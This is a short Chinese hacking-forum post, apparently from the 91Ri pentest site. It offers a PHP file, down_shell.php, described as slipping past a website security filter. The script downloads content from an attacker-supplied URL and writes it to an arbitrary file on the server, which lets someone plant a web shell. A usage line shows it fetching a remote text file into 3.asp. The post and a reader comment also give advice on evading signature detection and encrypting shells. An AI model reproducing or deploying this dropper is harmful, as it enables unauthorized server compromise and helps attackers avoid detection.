突破一流拦截的php代码
down_shell.php -可过一流信息拦截
<?php
$str=file_get_contents($_GET[‘url’]);
echo file_put_contents($_GET[‘file’],$str);
?>
use: ?url=http://www.sswowo.com/1.txt&file=3.asp
代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。
今日更新+0
-
渗透技巧 / pentest-skills
Linux常见的持久化后门汇总
-
渗透实例 / pentest-case
针对某国际信息通信公司从前期探测到内网提权的一次成功漏洞测试
-
渗透实例 / pentest-case
实战笔记:滑动验证码攻防对抗
-
神兵利器 / hackertools
使用Burp拦截Flutter App与其后端的通信
-
漏洞研究 / vulnerability
Vulhub漏洞系列:ActiveMQ任意文件写入漏洞分析
微信公众号
:搜索“91Ri”或扫描下面的二维码:
但是 难保传上去的shell 不被一流干掉了
加密一下,一般PHP挺好过的。